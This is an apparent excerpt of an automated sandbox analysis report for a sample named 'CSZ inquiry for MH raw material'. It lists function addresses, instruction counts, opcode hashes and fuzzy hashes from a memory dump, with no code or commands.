                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b745961e387ff0212b474a0894f6955d4f70c520f1ab427e11c8f41e0c879f42
                                                • Instruction ID: 2b503c5e0bf002e24afa9823a003c4ed08a73314c392b5393a347400f8db86c8
                                                • Opcode Fuzzy Hash: b745961e387ff0212b474a0894f6955d4f70c520f1ab427e11c8f41e0c879f42
                                                • Instruction Fuzzy Hash: AB118276A00616BBDB22DF59C980B5EFBB8FFC4790F51045DDA01AF240D730AE059B60
                                                Function 0152EA2E Relevance: .1, Instructions: 56COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8012fb2312679b1a33b281b368a2a3e4d3a3358930a82398760933a85a097832
                                                • Instruction ID: 942a7d0d990e0539fce4b1c173fe4b8c801e3ae03f22fb9ff10267bb25cc0b1a
                                                • Opcode Fuzzy Hash: 8012fb2312679b1a33b281b368a2a3e4d3a3358930a82398760933a85a097832
                                                • Instruction Fuzzy Hash: 2F01D2725111069FC325DB19D449F16BBF9FBC2314F21816EE105CF2A4D7B09D46CB90
                                                Function 0152E53E Relevance: .1, Instructions: 55COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                • Instruction ID: 58113bb5056f1347dfdf6ff414e5c3facdedbd3234915224178a75d77760e003
                                                • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                • Instruction Fuzzy Hash: C511CC727116D29BE723971CD565B2D77D8FF41798F1904A1DD418F792F728C842C290
                                                Function 0158E75D Relevance: .1, Instructions: 54COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                • Instruction ID: 6e1eb19433699b8a3418bdc28b2429b9c4318e8993f9d4e03ecb527395d9611d
                                                • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                • Instruction Fuzzy Hash: 2C019236600146AFE722BF58CC02F6A7AB9FB95750F058424EA05FF264E771DD40C790
                                                Function 014FA250 Relevance: .1, Instructions: 52COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                • Instruction ID: d414ccfdd12e44807e9ad850c15d028fa7da8e01779e3c3fbebc2cda3111d5aa
                                                • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                • Instruction Fuzzy Hash: 03012639614B229BCB318F19E840A337BA4FF95770711862EFE998B3A1D731D401CBA0
                                                Function 015D4940 Relevance: .1, Instructions: 52COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 983798c0de0a315725ff20d93cba6c68efd4320a077fb53af4d19788198f53c8
                                                • Instruction ID: d957c66eb39fce6102cc0a926bc9649325c30b991d858f71b1cdfba558329405
                                                • Opcode Fuzzy Hash: 983798c0de0a315725ff20d93cba6c68efd4320a077fb53af4d19788198f53c8
                                                • Instruction Fuzzy Hash: A701F5725416029FC332DF1ED840E16B7A8FB91770B254265E9A99F5AAE730EC01CBD0
                                                Function 0157E1D0 Relevance: .1, Instructions: 51COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a54a57b723d06be81235c074cb0e94c65a86c96975749c451a8bc6a0c7273b4a
                                                • Instruction ID: e8aa2b2f19688f0fdf155c5d77c2b98858a9b30f9e850f9a67505d3ada3ae85f
                                                • Opcode Fuzzy Hash: a54a57b723d06be81235c074cb0e94c65a86c96975749c451a8bc6a0c7273b4a
                                                • Instruction Fuzzy Hash: 1411CE32241302EFDB16AF09D882F06BBB8FF94B44F2000A9E9058F691C231ED00CA90
                                                Function 01506259 Relevance: .1, Instructions: 51COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a271c4f92575d0fc2c29f3ab38c1b984c18751ded9627cc5ba3e951456482d0a
                                                • Instruction ID: c246a74312d70e888b68cbc9555f202e9b3d7e843068d2ffac39b29489be2c35
                                                • Opcode Fuzzy Hash: a271c4f92575d0fc2c29f3ab38c1b984c18751ded9627cc5ba3e951456482d0a
                                                • Instruction Fuzzy Hash: 1C115E7054122AABDB66EB64CC41FE97374BF44714F504194B318AA0E1D6709E91DF84
                                                Function 01586050 Relevance: .0, Instructions: 50COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f02488665c96ea2668e018b829ec701f39f9f77c2e4cadbf103b17b975ceed30
                                                • Instruction ID: 4398f694ecb6865aef0f78a6cf7c0a50bfbfd4d50fda22e9df9705349e2f3274
                                                • Opcode Fuzzy Hash: f02488665c96ea2668e018b829ec701f39f9f77c2e4cadbf103b17b975ceed30
                                                • Instruction Fuzzy Hash: 1C111B76900019EBCB12EB94CC80DDF7BBCFF48254F054166A506EB211EA34AA15CBE0
                                                Function 0150208A Relevance: .0, Instructions: 50COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                • Instruction ID: 531518215f4d8cc25383dfe75f22156680fbdfb9fb0995652ab0ad1f3da763a6
                                                • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                • Instruction Fuzzy Hash: E10128322012118BEF12CA9DD894B5A77ABBFC4710F5544A6ED058F286DA71CC81C390
                                                Function 01596500 Relevance: .0, Instructions: 50COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 554273877128b994a3be447f852dd7691fe8672355be180a3b872a91ba0d1235
                                                • Instruction ID: b37d8d4a1dfd83749a6c4d294c64dc45f48e349a2bdd855ca748ea3f326d1ca8
                                                • Opcode Fuzzy Hash: 554273877128b994a3be447f852dd7691fe8672355be180a3b872a91ba0d1235
                                                • Instruction Fuzzy Hash: 481108326001469FD701CF28D440BA5BBF5FB96304F498159E844CF315D731EC44CBA1
                                                Function 0158C810 Relevance: .0, Instructions: 50COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2815d89051aaccd6948504ba1440be2f0650134c7214aa5e1b4796bafb4a5bda
                                                • Instruction ID: 16c70abaa4e7c803c4a74bd3bd7af9e98645abb00841156cc0a0eeec254ec29e
                                                • Opcode Fuzzy Hash: 2815d89051aaccd6948504ba1440be2f0650134c7214aa5e1b4796bafb4a5bda
                                                • Instruction Fuzzy Hash: 361118B1A0020A9FCB00DFA9D541AAEBBF8FF58250F10406AA905EB351D674EA018BA4
                                                Function 015AEA60 Relevance: .0, Instructions: 50COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9997db2cc11e35c6db11311bbd45cd59029f30c0f1c97c542f689a0eb6be7243
                                                • Instruction ID: e8fc2069955b525fd1d184113e794cb83d5a6fde66db4a948aebb68114987f2f
                                                • Opcode Fuzzy Hash: 9997db2cc11e35c6db11311bbd45cd59029f30c0f1c97c542f689a0eb6be7243
                                                • Instruction Fuzzy Hash: 1001D8311811129BDB33AB15C495D3EBBFAFF92650F95482EE2455F211C770EC41CB91
                                                Function 014FC020 Relevance: .0, Instructions: 49COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                • Instruction ID: f1637cbd384631f4575ff8099b55993e8eada5c426a9b1a1f675889785142be4
                                                • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                • Instruction Fuzzy Hash: 6D01B57210070A9FEB6296A9C850EA777F9FFC6254F04481EAA568F650DA70E502C750
                                                Function 015420F0 Relevance: .0, Instructions: 49COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7f8cfa088750c6c78b56d30d2a3b6fec670701b6b2dd846b8fbe6b09285a1e52
                                                • Instruction ID: f97c12ecc3b72bdfa5012286a9ed5204a64946c821b70950e724fd982edae7c2
                                                • Opcode Fuzzy Hash: 7f8cfa088750c6c78b56d30d2a3b6fec670701b6b2dd846b8fbe6b09285a1e52
                                                • Instruction Fuzzy Hash: E9116935A0120EAFDB05EFA4D851BAE7BB5FB84284F004099F9019B290EB35AE11CB90
                                                Function 0153E5CF Relevance: .0, Instructions: 49COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4cbd39df16ada21223a1b2efdd8af93cb78b252658fb1c417848996f91a6c261
                                                • Instruction ID: 048f554f94359b540c9f44e8bfa38e4465853094266dcd964acb432944ddd45e
                                                • Opcode Fuzzy Hash: 4cbd39df16ada21223a1b2efdd8af93cb78b252658fb1c417848996f91a6c261
                                                • Instruction Fuzzy Hash: F90184712415127FE312BB69CD80E57B7ECFFD5664B000529B2058B651DB64EC01C6E0
                                                Function 015969C0 Relevance: .0, Instructions: 49COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: af718ce2a90d82d2b01c0184a3e943e803f3f354a5681132fa8a677986b87b2f
                                                • Instruction ID: d01e91030bef9ad1f5f2bddf778b305ed58faf3ca03cdd3d8be4bb36a1edb98f
                                                • Opcode Fuzzy Hash: af718ce2a90d82d2b01c0184a3e943e803f3f354a5681132fa8a677986b87b2f
                                                • Instruction Fuzzy Hash: F1014C32214202DBC720DF6AC84896BBBE8FF84660F514529E9688F1C0E7349905C7D2
                                                Function 0158C460 Relevance: .0, Instructions: 48COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 076532dd6732388b4a3e8f4b5ad1122cccc314b94017af50b30ed2a679e95028
                                                • Instruction ID: 13ccfe6c985a1ca8a70bf52c1e3d94e732e2a65a38f1a917f09c3d0075721867
                                                • Opcode Fuzzy Hash: 076532dd6732388b4a3e8f4b5ad1122cccc314b94017af50b30ed2a679e95028
                                                • Instruction Fuzzy Hash: 13116D71A0120EEBDB15EFA8C840EEE7BB5FB88354F004059FD01AB390DA35E951CBA0
                                                Function 0158C97C Relevance: .0, Instructions: 48COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c6820087144e488c78e231c1f9214bff675f30d7e9bd3520f62f01cd7353efb2
                                                • Instruction ID: a1045faad204809030d6c336c6686069ce9ce09b89366d6d20ccf20875d7d1bf
                                                • Opcode Fuzzy Hash: c6820087144e488c78e231c1f9214bff675f30d7e9bd3520f62f01cd7353efb2
                                                • Instruction Fuzzy Hash: C21139B16183099FC700DF69D441A9BBBE4FF99750F00495EB998DB391E670E900CBA6
                                                Function 0158CA11 Relevance: .0, Instructions: 48COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2176f6d57bbdf9b2f7e60743d702ac9c595b15ee82deacd636543141e3f5d963
                                                • Instruction ID: 43719485cae7bba9911436dee432d2977b231276e55e067b8fc93843e23800f4
                                                • Opcode Fuzzy Hash: 2176f6d57bbdf9b2f7e60743d702ac9c595b15ee82deacd636543141e3f5d963
                                                • Instruction Fuzzy Hash: 37115E716183059FC710DF69D44195BBBE4FF99750F00491EF998DB3A4E670E900CBA6
                                                Function 0151E016 Relevance: .0, Instructions: 46COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                • Instruction ID: ff17af2187782f4d3db35c7c1f4f4b561829cd74e85abe367d70329d9b4e5295
                                                • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                • Instruction Fuzzy Hash: 5B012C72200585DFE327D71DC959F2A7BD8FB85B54F0A04A2FD05CF692D668DC40C661
                                                Function 014F826B Relevance: .0, Instructions: 46COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3a9fb5fa80a185194806e4474bbc094984695419a4cf856baf4c69fb3b670f0c
                                                • Instruction ID: 2163784310643f504f382f2a2fabab2a86b8649a3aa867aa1826ba1db46c2a03
                                                • Opcode Fuzzy Hash: 3a9fb5fa80a185194806e4474bbc094984695419a4cf856baf4c69fb3b670f0c
                                                • Instruction Fuzzy Hash: 93018439700906DFDB14EB69D8549AF77A9FF91620B16402E9A01EF790EE30E902C791
                                                Function 015AEB50 Relevance: .0, Instructions: 46COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 8cce1ed22e53e3f0b493d2e8859c170a81ff2205faa08b676b0bc9fd738d7eff
                                                • Instruction ID: d0eb5a7778bd392ff22f826b2ac74338a9dd5cf1ce9d8112410c994b2e195485
                                                • Opcode Fuzzy Hash: 8cce1ed22e53e3f0b493d2e8859c170a81ff2205faa08b676b0bc9fd738d7eff
                                                • Instruction Fuzzy Hash: 2C01A7712817069FE3315B16D841F06BAA8FF95B50F11482DB3059F394D6B0A841CB94
                                                Function 01502582 Relevance: .0, Instructions: 45COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 874dae66be81b37453c638c36c879a62b17006cd486fced7088c046736c1fef8
                                                • Instruction ID: 6a67d44fa7b1681fb1de3e6bddca3d73bbea71362d932a8859aeb52390aa9889
                                                • Opcode Fuzzy Hash: 874dae66be81b37453c638c36c879a62b17006cd486fced7088c046736c1fef8
                                                • Instruction Fuzzy Hash: 54F0F932641A11BBC7329B968C44F477EA9FBC4B90F104029A6059F640D630ED01C6A0
                                                Function 0152C073 Relevance: .0, Instructions: 43COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                • Instruction ID: d042bb042ff491b68bcbf0e13c384a85e0858f903e656772e739963998ef852e
                                                • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                • Instruction Fuzzy Hash: A7F0C8B3600611ABD324CF4DDC40E5BFBEAEBD5A80F048128E505CB220E631DD04CB90
                                                Function 015D634F Relevance: .0, Instructions: 43COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 77ca9badf44b769543e22aa0f491410cbc8b7ffe16216cc00bdd5def603a6a2c
                                                • Instruction ID: 3ffd3e9edf35a83fecd7d4bf46f22f00f6d54d8735fe9ca4859a1c9f7db685bf
                                                • Opcode Fuzzy Hash: 77ca9badf44b769543e22aa0f491410cbc8b7ffe16216cc00bdd5def603a6a2c
                                                • Instruction Fuzzy Hash: CC014471A1020AEFDB04DFA9D551A9EB7F8FF98304F10405AF914EB350D774DA018BA4
                                                Function 014FC310 Relevance: .0, Instructions: 43COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                • Instruction ID: 33a3e1473329a04658f9ee4c34c445abf7b7b9661c43e002033713fd78baeb10
                                                • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                • Instruction Fuzzy Hash: 57F0FC332046279BD732179A88D0F2BA595DFE1AE4F1A003FE3059B364C9708D0256D1
                                                Function 015D625D Relevance: .0, Instructions: 43COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ffe4a65f18a6df9d96ee594e39e2691bd2853d5a46a3efb2798a5f51940e1800
                                                • Instruction ID: e0bcd9d569ee4ea1f97b233015f242537fd86ee730e56dfe0d5c77eb6ceb5216
                                                • Opcode Fuzzy Hash: ffe4a65f18a6df9d96ee594e39e2691bd2853d5a46a3efb2798a5f51940e1800
                                                • Instruction Fuzzy Hash: 2D014471A1021AEFDB04DFADD451AAEB7F8FF58344F10405AF914EB351D6749901CBA4
                                                Function 015D62D6 Relevance: .0, Instructions: 43COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9b619f82ac4de3098509d3f73f04c141b11ed5894bbdc7f719e1ab5cd288873a
                                                • Instruction ID: d1f930d4fa2341fa1039b4d1a46d204746b0948f51d948994bb00936a80151b4
                                                • Opcode Fuzzy Hash: 9b619f82ac4de3098509d3f73f04c141b11ed5894bbdc7f719e1ab5cd288873a
                                                • Instruction Fuzzy Hash: BA014471A0020AEFDB04DFA9D455A9EBBF8FF58304F50445AF914EB390D6749D018BA4
                                                Function 0153CA6F Relevance: .0, Instructions: 42COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                • Instruction ID: 6d24c9d5e71533827e10bbb2d404fc38159e66dda61b067852d90be170ada2ce
                                                • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                • Instruction Fuzzy Hash: 6101F9313006859BE323971DD809F5DBFD9FF81754F094466FA049F691D6F4C801C210
                                                Function 015D61E5 Relevance: .0, Instructions: 41COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a0a226a8af9e00a575a56eb8a60783965f47c6cab9f4126e9cf52d4b93937ae5
                                                • Instruction ID: eac79defbf37012d7edaa695826693a204778aa92c774292bbed2069a9f47ec5
                                                • Opcode Fuzzy Hash: a0a226a8af9e00a575a56eb8a60783965f47c6cab9f4126e9cf52d4b93937ae5
                                                • Instruction Fuzzy Hash: 3D018F71A0024ADBDB00DFA9D445AEEBBF8FF58314F14005AE500EB280D734EA02CB94
                                                Function 015863C0 Relevance: .0, Instructions: 41COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                • Instruction ID: 568bc35086373dc2018d12df35ab9cae5ad0556bdf1270026fa9b26b6d1aaa80
                                                • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                • Instruction Fuzzy Hash: E7F0127220001EBFEF02AF94DD80DAF7B7DFF95298B104125FA11A6160D631DD21A7A0
                                                Function 0158A4B0 Relevance: .0, Instructions: 40COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 91518bd5a25c694aa9f15cf612c7f7f74d8f3578fd036b1e2cc2f8d324ececcb
                                                • Instruction ID: c0cb3f578720030ee1a3bf3b7cbd01df2dcbd7dec93e6aadf17eb923c360de5c
                                                • Opcode Fuzzy Hash: 91518bd5a25c694aa9f15cf612c7f7f74d8f3578fd036b1e2cc2f8d324ececcb
                                                • Instruction Fuzzy Hash: B5018936110149ABCF12AE84D840EDE3F66FB4C664F068116FE286A220C332D9B0EB91
